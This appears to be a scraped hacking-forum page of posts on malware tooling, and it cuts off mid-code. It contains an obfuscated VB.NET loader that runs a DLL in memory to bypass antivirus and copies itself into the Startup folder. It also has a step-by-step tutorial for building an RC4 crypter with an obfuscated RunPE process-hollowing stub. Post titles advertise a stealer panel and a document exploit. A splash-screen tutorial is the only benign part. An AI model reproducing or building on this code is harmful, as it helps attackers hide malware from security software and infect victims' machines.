Welcome to LeVeL23HackTools

queda de faraó

  1. Run a DLL in memory

    I bring a video showing how to execute a DLL in memory, bypassing AVs.

        Public Class Class1
            Public Shared Sub Mestre_Queda()
                Shell("cmd /c ipconfig/release & ping -n 60 127.0.0.1 & ipconfig/renew & exit", vbHide)
                'Interaction.MsgBox("testando esse karai")
                Dim Farao_Sama As String = "..."
                Dim APG() As Byte = Convert.FromBase64String(Farao_Sama)
                Threading.Thread.GetDomain().Load(APG).EntryPoint.Invoke(Nothing, Nothing)
            End Sub
        End Class

        Imports System
        Imports System.IO
        Module Module1
            Sub Main()
                System.Threading.Thread.Sleep(35000)
                Dim startups As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
                ' Shell("cmd /c ipconfig/release & ping -n 60 127.0.0.1 & ipconfig/renew & exit", vbHide)
                מבבנקְסאְֹטְְאְקמוְדפבסגקְּוקְְִּקבְגְפְַ(My.Resources.dll, "dll.Class1", "Mestre_Queda")
                System.IO.File.Copy(Application.ExecutablePath, startups + "\\Inject.exe")
                ''1 Name File : 2 Name Class1 : 3 Name Main
            End Sub
            Public Function מבבנקְסאְֹטְְאְקמוְדפבסגקְּוקְְִּקבְגְפְַ(ByVal I() As Byte, ByVal C As String, ByVal P As String) As Object
                Dim a As Text.ASCIIEncoding = Text.ASCIIEncoding.ASCII
                Dim HKHKJKJK As New System.Reflection.Emit.DynamicMethod("", GetType(Object), New [Type]() {GetType(Byte()), GetType(String), GetType(String), GetType(Object())})
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldarg_0)
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Call, GetType(Reflection.Assembly).GetMethod(a.GetString({&H4C, &H6F, &H61, &H64}), New [Type]() {GetType(Byte())}))
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldarg_1)
                HKHKJKJK.GetILGenerator.EmitCall(System.Reflection.Emit.OpCodes.Callvirt, GetType(Reflection.Assembly).GetMethod(a.GetString({&H47, &H65, &H74, &H54, &H79, &H70, &H65}), New [Type]() {GetType(String)}), Nothing)
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Call, GetType(Activator).GetMethod(a.GetString({&H43, &H72, &H65, &H61, &H74, &H65, &H49, &H6E, &H73, &H74, &H61, &H6E, &H63, &H65}), New [Type]() {GetType(Type)}))
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Call, GetType(System.Runtime.CompilerServices.RuntimeHelpers).GetMethod(a.GetString({&H47, &H65, &H74, &H4F, &H62, &H6A, &H65, &H63, &H74, &H56, &H61, &H6C, &H75, &H65}), New [Type]() {GetType(Object)}))
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldarg_2)
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldc_I4_1)
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldarg_3)
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Call, GetType(Interaction).GetMethod(a.GetString({&H43, &H61, &H6C, &H6C, &H42, &H79, &H4E, &H61, &H6D, &H65})))
                HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ret)
                Return CallByName(HKHKJKJK, a.GetString({&H49, &H6E, &H76, &H6F, &H6B, &H65}), CallType.Method, {HKHKJKJK, New Object() {I, C, P, New Object() {}}})
            End Function
        End Module
  2. Ab Stealer Panel + Video Tutorial by KingDomSc

    Re: Ab Stealer Panel + Video Tutorial by KingDomSc grab outlook logins?
  3. Silent DOC Exploit - Python 2016

    Re: Silent DOC Exploit - Python 2016 CONGRATULATIONS, it's a great tool
  4. Downloader Analysis, Keylogger Banker, Analysis with IDA, Spynet Server Analysis, Dangers of Analysis, Preparing the Olly Environment, Preparation, Removing UPX with Olly
  5. sOURCE SUBMAIN GENERATOR AU3

    AutoIt "submain and RC4" GENERATOR FOR STUDY. PASSWORD: queda_most. Files are Clean & Functional [Analyzed by you2004975]
  6. [ES]-Creating-a-splash-scren-in-effect

    Okay, this simple post shows how to do an effect on your splash screen, which gives a more professional look to our projects.

    Create a new form. After creating the new form, set an image as the background; the next step is to add a timer. Now let's go to the source.

    In the Form2_FormClosing event, add:

        For FadeOut = 90 To 10 Step -10
            Me.Opacity = FadeOut / 100
            Me.Refresh()
            Threading.Thread.Sleep(500)
        Next

    In the Form2_Load event, add:

        Timer1.Start()
        For FadeIn = 0.0 To 1.1 Step 0.1
            Me.Opacity = FadeIn
            Me.Refresh()
            Threading.Thread.Sleep(100)
        Next

    In the timer event:

        Timer1.Enabled = False
        Form1.Show()
        Me.Visible = False

    Now, in the project properties, set Form2 as the startup form. Here is the finished project, ready.
  7. [es][tuto]crypter runtime vb.net by queda

    Hi folks, this post is going to teach how to make a crypter with RunPE and a splash effect in VB 2008; it is dedicated to the oversec dekoders.

    First we need to build two forms, one for the client and another for the splash:

    Form1 -- client
    Form2 -- Splash

    Let's get to work and make the client. First, create a text box and two buttons. Once that is done, go to the code and add at the top:

        Imports System.Text
        Const Jod_Separador = "@_Jod_@"

    Add the OpenFileDialog component. In the click event of button 1, add the following code:

        '----------------Opening the file to be encrypted------------
        OpenFileDialog1.FileName = ""
        OpenFileDialog1.Filter = "Exe(*.exe)|*.exe"
        OpenFileDialog1.ShowDialog()
        TextFile.Text = OpenFileDialog1.FileName

    In the click event of button 2, we are going to add two variable declarations:

        '--------------Variable declarations---------------------
        Dim Jod_Aberturabin As String
        Dim Jod_Modulo_Princi As String
        Dim Jod_Separador As String = "@_Jod_@"
        Dim Jod_nomeArq As String

    In the click event of button 2, add the following code:

        '----------------File protection---------------------
        If Jod_salvar.ShowDialog = Windows.Forms.DialogResult.OK Then
            Jod_nomeArq = Jod_salvar.FileName
        Else : Exit Sub
        End If
        Jod_salvar.Filter = "Executáveis (*.exe)|*.exe"
        '-----------------------------------------------------------

    Continuing with button two, we are going to open the files in binary mode:

        FileOpen(1, TextFile.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        Jod_Aberturabin = Space(LOF(1))
        FileGet(1, Jod_Aberturabin)
        FileClose(1)
        '-------------------------------------------------------------
        FileOpen(1, Application.StartupPath & "\stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        Jod_Modulo_Princi = Space(LOF(1))
        FileGet(1, Jod_Modulo_Princi)
        FileClose(1)
        '------------------------------------------------------------
        FileOpen(1, Jod_nomeArq, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(1, Jod_Modulo_Princi & Jod_Separador & rc4(Jod_Aberturabin, "Jodkeyencript"))
        FileClose(1)

    Afterwards, add the encryption module; RC4 was the one chosen:

        Public Shared Function rc4(ByVal message As String, ByVal password As String) As String
            Dim i As Integer = 0 'take from here
            Dim j As Integer = 0
            Dim cipher As New StringBuilder
            Dim returnCipher As String = String.Empty
            Dim sbox As Integer() = New Integer(256) {}
            Dim key As Integer() = New Integer(256) {}
            Dim intLength As Integer = password.Length
            Dim a As Integer = 0
            While a <= 255
                Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))
                key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
                sbox(a) = a
                System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
            End While
            Dim x As Integer = 0
            Dim b As Integer = 0
            While b <= 255
                x = (x + sbox(b) + key(b)) Mod 256
                Dim tempSwap As Integer = sbox(b)
                sbox(b) = sbox(x)
                sbox(x) = tempSwap
                System.Math.Max(System.Threading.Interlocked.Increment(b), b - 1)
            End While
            a = 1
            While a <= message.Length
                Dim itmp As Integer = 0
                i = (i + 1) Mod 256
                j = (j + sbox(i)) Mod 256
                itmp = sbox(i)
                sbox(i) = sbox(j)
                sbox(j) = itmp
                Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
                Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
                itmp = Asc(ctmp)
                Dim cipherby As Integer = itmp Xor k
                cipher.Append(Chr(cipherby))
                System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
            End While
            returnCipher = cipher.ToString
            cipher.Length = 0
            Return returnCipher
        End Function

    Done, that concludes the client structure. Now let's make the splash: oversec.org/showthread.php?1107-ES-Creating-a-splash-scren-in-effect

    Now we move on to developing the stub. Create a new project and, in the form, add the following code:

        Me.Visible = False
        Me.Hide()
        '---------Separator-----------------
        Dim Jod_Form_seperador As String = "@_Jod_@"
        Dim Jod_Capt_Prc As String
        Jod_Capt_Prc = Process.GetCurrentProcess().MainModule.FileName
        Dim Jod_Ptc As String = System.IO.Path.GetTempPath
        Dim Jod_Arq_Leitor, Jod_Pega_Geral(), Jod_Para_cry As String
        '------------------------------------
        FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
        Jod_Arq_Leitor = Space(LOF(1))
        FileGet(1, Jod_Arq_Leitor)
        FileClose(1)
        '--------------------------------------
        Jod_Pega_Geral = Split(Jod_Arq_Leitor, Jod_Form_seperador)
        Jod_Para_cry = iRvFqeDEfJ(Jod_Pega_Geral(1), "Jodkeyencript")
        Dim Jod_Convert_Bytes() As Byte
        Jod_Convert_Bytes = Encoding.Default.GetBytes(Jod_Para_cry)
        Try
            S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0.Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(Jod_Convert_Bytes, Jod_Capt_Prc)
        Catch ex As Exception
        End Try
        FileOpen(5, Jod_Ptc & "\Jodhsghgsjhks.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(5, Jod_Para_cry)
        FileClose(5)
        Me.Close()

    Now create a new RunPE module:

        Imports System.ComponentModel
        Imports System.Runtime.InteropServices
        Public Class S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0
            Public Const SDnNle9g5VF2VbJGGZlWNjH8OJ9Wcjyw9HYEPDliWtCnf9 As Long = &H200
            Public Const SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt As Long = &H40
            Public Const S7MFd3CpqpMqb2C0vP4pbzNH0tPv9tgbwrgJwOm8ymYHSn As Long = &H80
            Public Const S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A As Long = &H20
            Public Const SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM As Long = &H10
            Public Const SJf1ylUN6liDLXTU4ZfL3A2X53qOFXCvSGJCxTKR9t33GL As Long = &H8
            Public Const Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So As Long = &H1
            Public Const SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb As Long = &H4
            Public Const SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC As UInt32 = &H2
            Shared Sub Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(ByVal SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq() As Byte, ByVal ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg As String)
                Dim SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK 
= New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF As S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR, SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6 Dim SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY = GCHandle.Alloc(SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, GCHandleType.Pinned) Dim SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F As Integer = SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject.ToInt32 Dim SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT As New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT = Marshal.PtrToStructure(SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject, SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.GetType) SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.Free() If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.CreateProcess(Nothing, ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh, False, 4, Nothing, Nothing, SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC) = 0 Then Return Dim SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu As New 
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address), SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.GetType) Dim S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B As Long, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7 As UInteger SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU.CB = Len(SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU) SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Flags = 65538 If SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Signature <> 17744 Or SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Magic <> 23117 Then Return If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.GetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK) And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ReadProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, 4, 0) >= 0 And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ZwUnmapViewOfSection(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au) >= 0 Then Dim ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW As UInt32 = S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualAllocEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Image, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SImage, 12288, 4) If ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW <> 0 Then S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW, 
SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SHeaders, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7) SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B = SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address + 248 For SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 As Integer = 0 To SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.File.Sections - 1 S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B + SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 * 40), S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.GetType) Dim Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size) As Byte For S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt As Integer = 0 To S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size - 1 : Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) = SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Pointer + S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) : Next S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7) S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualProtectEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Misc.Size, SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Flags), 
S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au) Next SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 Dim Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv = BitConverter.GetBytes(ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW) S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv, 4, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7) SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Eax = ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Address S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK) S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ResumeThread(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread) End If End If End Sub Private Shared Function Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(ByVal Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH As Long, ByVal SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F As Long) As Long Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6 = S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH) / (2 ^ SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F) End Function Private Shared Function S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(ByVal S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t As Long) As Double Const SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc = 4294967296.0# If S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t < 0 Then S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t + SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc Else : S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t End If End Function Private Shared Function 
SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(ByVal SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ As Long) As Long Dim SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w() As Object = {Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So, SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM, SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC, _ S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A, SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt, _ SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt} SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh = SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w(Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ, 29)) End Function Friend Class S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ Structure Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32 Dim Registers As Byte() End Structure Structure SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger Dim RegisterArea As Byte() Dim State As UInt32 End Structure Structure SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N Dim Address, Size As UInt32 End Structure Structure SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp Dim Name As Byte, Misc As SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32 End Structure Structure Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer End Structure Structure SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer Dim ShowWindow, ReservedB As Short, ReservedC, Input, 
Output, [Error] As Integer End Structure Structure SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6 Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer End Structure Structure S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16 Dim ReservedA As UInt16() Dim ID, Info As UInt16 Dim ReservedB As UInt16() Dim Address As Int32 End Structure Structure Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh Dim Signature As UInt32, File As Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw, [Optional] As SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q End Structure Structure Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16 End Structure Structure SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32 Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16 Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32 Public DataDirectory As SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7() End Structure Structure SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7 Dim Address, Size As UInt32 End Structure Declare Auto Function CreateProcess Lib "kernel32" (ByVal Jodgsgusname As String, ByVal Jodhjgsjhgsjcommand As String, ByRef process As SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByRef thread As 